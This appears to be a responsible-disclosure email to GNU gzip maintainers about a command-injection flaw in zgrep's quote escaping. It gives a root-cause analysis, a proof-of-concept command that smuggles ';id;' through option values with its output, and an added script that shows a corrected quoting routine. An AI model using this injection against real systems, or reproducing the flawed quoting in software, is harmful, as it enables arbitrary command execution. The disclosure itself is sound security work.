Dear GNU gzip Maintainers,
I am writing to responsibly disclose an arbitrary command injection
vulnerability I have identified in the zgrep utility.
The vulnerability is caused by a logical flaw in how zgrep escapes single
quotes within command-line options. If an attacker controls the arguments
passed to zgrep, they can break out of the shell quoting mechanism and
execute arbitrary commands.
Root Cause Analysis
In the options parsing while loop, the script attempts to identify and
escape options containing single quotes so they can be safely evaluated by
the eval "$grep$args" statement at the end of the script.
The vulnerable block is as follows:
case $option in
  (*\'?*)
    option=\'$(printf '%s\n' "$option" | LC_ALL=C sed "$escape");;
  (*)
    option="'$option'";;
esac
If an option ends exactly with a single quote (e.g., --a='), the pattern
fails to match, and execution falls through to the default case (*), which
simply wraps the string in additional single quotes: option="'$option'".
This results in three single quotes ('--a=''), which unbalances the shell
quoting. An attacker can use two such options to completely break out of
the quoted string and inject shell metacharacters.
Proof of Concept
The following command demonstrates the injection. By supplying two
malicious options that end in single quotes, the space between them becomes
unquoted, allowing the ; separator and id command to be executed by eval.
*Command:*
zgrep "--a='" "--b=;id;'" "pattern" file.gz
*Output:*
When executed, the shell evaluates grep '--a='' '--b=;id;''. The grep
command will fail due to the invalid arguments, but the injected id command
will execute successfully:
zgrep "--a='" "--b=;id;'" "pattern" file.gz
gzip: file.gz: No such file or directory
grep: --b=: invalid context length argument
uid=1000(sland) gid=1000(sland)
groups=1000(sland),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),115(libvirt)
/usr/bin/zgrep: 1: eval: : Permission denied
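As an added example (not part of this report and not gzip's own code), the following POSIX sh script reproduces the branch structure described in the root cause analysis beside a quoting routine that escapes every single quote unconditionally, and checks, without running anything through eval except a harmless `set --`, that the two options from the proof of concept stay balanced and remain single arguments. Function names and the `escape_quotes` helper are assumptions made for this illustration.

```sh
#!/bin/sh
# Added example, not code from the report or from gzip's zgrep: the report's
# quoting logic reproduced beside a uniform quoting routine, so the difference
# on an option that ends in a single quote can be checked without executing it.

# escape_quotes: rewrite every ' as '\'' (close quote, literal quote, reopen).
# Callers wrap this in $(...), which strips a trailing newline; harmless here.
escape_quotes() {
  printf '%s' "$1" | sed "s/'/'\\\\''/g"
}

# flawed_quote: the branch structure described in the report. Only options
# with a character AFTER a quote reach the escaping branch; an option whose
# last character is the quote falls through and is merely wrapped, which
# yields an odd number of quotes (e.g. '--a='').
flawed_quote() {
  option=$1
  case $option in
  (*\'?*) option=\'$(escape_quotes "$option")\' ;;
  (*)     option="'$option'" ;;
  esac
  printf '%s' "$option"
}

# safe_quote: escape unconditionally, so the output is always one balanced
# single-quoted word regardless of where quotes sit in the input.
safe_quote() {
  printf "'%s'" "$(escape_quotes "$1")"
}

# eval_word_count: quote each argument with safe_quote, join them the way
# zgrep joins $args, and let eval re-split them into positional parameters.
# No command is run; the count shows every argument survived as one word.
eval_word_count() {
  args=
  for option; do
    args="$args $(safe_quote "$option")"
  done
  eval "set -- $args"
  printf '%s' "$#"
}

# Demonstration on the two options from the proof of concept (constructed).
printf 'flawed: %s %s\n' "$(flawed_quote "--a='")" "$(flawed_quote "--b=;id;'")"
printf 'safe:   %s %s\n' "$(safe_quote "--a='")" "$(safe_quote "--b=;id;'")"
printf 'words after eval with safe quoting: %s\n' \
  "$(eval_word_count "--a='" "--b=;id;'" pattern file.gz)"
```

Run with `sh script.sh`; the flawed form prints the three-quote `'--a=''` from the report, while the safe form prints `'--a='\'''` and eval splits the four arguments into exactly four words.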
Thank you for your time and for your ongoing work maintaining gzip. Please
let me know if you need any additional clarification or testing regarding
this issue.
Best regards,
Leenear